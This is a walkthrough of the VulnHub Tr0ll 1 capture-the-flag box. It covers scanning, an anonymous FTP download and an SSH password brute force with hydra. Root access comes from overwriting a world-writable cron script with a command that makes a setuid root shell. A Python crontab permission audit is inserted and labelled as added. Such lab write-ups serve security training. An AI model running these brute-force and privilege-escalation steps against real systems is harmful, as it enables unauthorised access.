
Walkthrough-TR0LL 1

Date: 2023-05-31 13:47:16  Views: 47

0x01 Environment

Target machine:
https://www.vulnhub.com/entry/tr0ll-1,100/

This box is quite CTF-style.

0x02 Process

1. Information gathering

┌──(root㉿kali)-[/home/kali/Desktop/oscp]
└─# netdiscover -r 192.168.60.0/24

 Currently scanning: Finished!   |   Screen View: Unique Hosts                                                             
                                                                                                                           
 9 Captured ARP Req/Rep packets, from 9 hosts.   Total size: 540                                                           
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.60.155  00:0c:29:54:74:4f      1      60  VMware, Inc.                                                            

Found the target IP: 192.168.60.155

Open ports:

┌──(root㉿kali)-[/home/kali/Desktop/oscp]
└─# nmap --min-rate 10000 -p- 192.168.60.155 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-30 22:16 EDT
Nmap scan report for troll (192.168.60.155)
Host is up (0.0012s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:54:74:4F (VMware)

Nmap done: 1 IP address (1 host up) scanned in 4.05 seconds

2. Approach

FTP is open, so check FTP first.

┌──(kali㉿kali)-[~]
└─$ ftp 192.168.60.155
Connected to 192.168.60.155.
220 (vsFTPd 3.0.2)
Name (192.168.60.155:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||38638|).
150 Here comes the directory listing.
-rwxrwxrwx    1 1000     0            8068 Aug 10  2014 lol.pcap
226 Directory send OK.
ftp> pwd
Remote directory: /
ftp> get lol.pcap
local: lol.pcap remote: lol.pcap
229 Entering Extended Passive Mode (|||28826|).
150 Opening BINARY mode data connection for lol.pcap (8068 bytes).
100% |********************************************************************************|  8068        3.27 MiB/s    00:00 ETA
226 Transfer complete.
8068 bytes received in 00:00 (2.50 MiB/s)
ftp> exit
221 Goodbye.

The anonymous FTP share contains lol.pcap. Opening it in Wireshark shows a transfer of secret_stuff.txt in the traffic, together with its contents.

The contents reveal a path: sup3rs3cr3tdirlol

Opening port 80 in the browser, it looks very CTF-like.

Browsing to the path found above reveals a file named roflmao.

Download it locally and inspect the file type and its strings:

┌──(root㉿kali)-[/home/kali/Desktop/oscp]
└─# file roflmao 
roflmao: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=5e14420eaa59e599c2f508490483d959f3d2cf4f, not stripped

┌──(root㉿kali)-[/home/kali/Desktop/oscp]
└─# strings roflmao                    
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
printf
__libc_start_main
__gmon_start__
GLIBC_2.0
PTRh
[^_]
Find address 0x0856BF to proceed

The binary contains the string "Find address 0x0856BF to proceed". That is not a memory address but a new web path: 0x0856BF

That directory yields a username file:

maleus
ps-aux
felux
Eagle11
genphlux
usmc8892
blawrg
wytshadow
vis1t0r
overflow

And a password file:

From the hint, the password should be the literal string Pass.txt (a small complaint: this is what CTF is like).
Brute-force SSH with the username list and that single password:

┌──(root㉿kali)-[/home/kali/Desktop/oscp]
└─# hydra -L user.lst -p 'Pass.txt' 192.168.60.155 ssh
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-05-30 23:01:43
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 10 tasks per 1 server, overall 10 tasks, 10 login tries (l:10/p:1), ~1 try per task
[DATA] attacking ssh://192.168.60.155:22/
[22][ssh] host: 192.168.60.155   login: overflow   password: Pass.txt
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-05-30 23:01:46

Valid credentials obtained:

overflow:Pass.txt

SSH login:

┌──(kali㉿kali)-[~]
└─$ ssh overflow@192.168.60.155
The authenticity of host '192.168.60.155 (192.168.60.155)' can't be established.
ED25519 key fingerprint is SHA256:jhpbgUldAKI9YAJOKhJZe9ypYt7GlEKUKU2WQ+zZBSs.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.155' (ED25519) to the list of known hosts.
overflow@192.168.60.155's password: 
Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic i686)

 * Documentation:  https://help.ubuntu.com/

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Wed Aug 13 01:14:09 2014 from 10.0.0.12
Could not chdir to home directory /home/overflow: No such file or directory
$ id
uid=1002(overflow) gid=1002(overflow) groups=1002(overflow)
$ 

Privilege escalation

Look for world-writable files:

$ find / -perm -0002 -type f -print 2>/dev/null | grep -v /proc/
/srv/ftp/lol.pcap
/var/tmp/cleaner.py.swp
/var/www/html/sup3rs3cr3tdirlol/roflmao
/var/log/cronlog
/sys/fs/cgroup/systemd/user/1002.user/8.session/cgroup.event_control
/sys/fs/cgroup/systemd/user/1002.user/cgroup.event_control
/sys/fs/cgroup/systemd/user/cgroup.event_control
/sys/fs/cgroup/systemd/cgroup.event_control
/sys/kernel/security/apparmor/.access
/lib/log/cleaner.py
$ cat /lib/log/cleaner.py
#!/usr/bin/env python
import os
import sys
try:
        os.system('rm -r /tmp/* ')
except:
        sys.exit()
$ cat /var/log/cronlog 
*/2 * * * * cleaner.py

The script /lib/log/cleaner.py is world-writable, and /var/log/cronlog shows a scheduled task that runs it every 2 minutes.
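The root cause is a root cron job whose script anyone can edit. The following added Python audit (not part of the original post or the box) parses crontab entries, resolves each command and flags scripts that are world-writable, not owned by the expected user, or sitting in a world-writable directory; the demo() layout and its crontab text are constructed.

```python
import os
import stat
import tempfile

def parse_cron_commands(crontab_text, system_crontab=False):
    """Yield (schedule, command); system crontabs carry a user field that is dropped."""
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment or VAR=value line
        fields = line.split(None, 6 if system_crontab else 5)
        if len(fields) == (7 if system_crontab else 6):
            yield " ".join(fields[:5]), fields[-1]

def resolve_program(prog, search_path):
    """File cron would execute: absolute as given, else first hit on search_path."""
    candidates = [prog] if os.path.isabs(prog) else [os.path.join(d, prog) for d in search_path]
    return next((c for c in candidates if os.path.isfile(c)), None)

def writable_cron_scripts(crontab_text, search_path, owner_uid=0, system_crontab=False):
    """Return [(schedule, path, reasons)] for scripts a non-owner could alter or replace."""
    findings = []
    for schedule, command in parse_cron_commands(crontab_text, system_crontab):
        path = resolve_program(command.split()[0], search_path)
        if path is None:
            continue
        st, parent = os.stat(path), os.stat(os.path.dirname(path))
        reasons = []
        if st.st_mode & stat.S_IWOTH:
            reasons.append("world-writable file")
        if st.st_uid != owner_uid:
            reasons.append("unexpected owner uid %d" % st.st_uid)
        if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
            reasons.append("world-writable directory")  # file can be swapped out
        if reasons:
            findings.append((schedule, path, reasons))
    return findings

def demo():
    """Constructed layout mirroring the box: a mode-777 cleaner.py beside a 755 script."""
    d = tempfile.mkdtemp()  # created 0700, so the directory check stays clean
    for name, mode in (("cleaner.py", 0o777), ("backup.py", 0o755)):
        p = os.path.join(d, name)
        with open(p, "w") as f:
            f.write("#!/usr/bin/env python\n")
        os.chmod(p, mode)
    crontab = "# constructed\nPATH=/bin\n*/2 * * * * cleaner.py\n0 3 * * * backup.py\n"
    return writable_cron_scripts(crontab, search_path=(d,), owner_uid=os.getuid())
```

On a real host, run it over /etc/crontab, /etc/cron.d/* and root's crontab with the PATH those files set; the fix is chmod 755 and root ownership on the script and its directory.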

Next comes privilege escalation through that scheduled task: replace the body of the script with a command that creates a setuid root shell, then wait for cron to run it.

$ vim /lib/log/cleaner.py

$ cat /lib/log/cleaner.py
#!/usr/bin/env python
import os
import sys
try:
        os.system('cp /bin/sh /tmp/sh && chmod 4777 /tmp/sh')
except:
        sys.exit()

$ /tmp/sh
# id
uid=1002(overflow) gid=1002(overflow) euid=0(root) groups=0(root),1002(overflow)
# ls /root
proof.txt
# cat /root/proof.txt
Good job, you did it! 


702a8c18d29c6f3ca0d99ef5712bfbdc

From: https://www.cnblogs.com/jarwu/p/17445077.html
